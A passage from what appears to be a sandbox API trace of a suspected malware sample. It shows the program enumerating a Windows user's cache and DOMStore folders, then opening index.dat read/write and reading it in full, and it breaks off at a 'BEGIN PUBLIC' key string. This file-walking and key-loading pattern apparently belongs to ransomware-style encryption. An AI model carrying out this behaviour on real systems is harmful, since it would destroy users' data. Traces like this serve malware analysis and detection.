HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0217.773] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0217.773] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0217.774] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0217.774] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0217.774] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0217.774] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0217.774] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0217.774] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0217.774] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0217.775] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0217.775] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0217.775] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0217.775] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0217.775] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0217.775] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0217.775] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0217.775] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0217.775] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0217.775] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0217.776] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0217.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0217.777] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0217.777] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0217.777] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0217.777] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0217.777] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0217.777] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0217.777] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0217.777] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0217.777] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0217.777] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.778] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.778] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0217.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0217.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.779] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.779] PathFindFileNameW (pszPath="") returned="" [0217.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.780] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.780] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36USA68T", cAlternateFileName="")) returned 1 [0217.781] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3O75JDME", cAlternateFileName="")) returned 1 [0217.781] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0217.781] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0217.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.781] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=32768) returned 1 [0217.781] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.783] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.783] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.785] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.785] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x8000, lpOverlapped=0x0) returned 1 [0217.787] lstrlenA (lpString="-----BEGIN PUBLIC 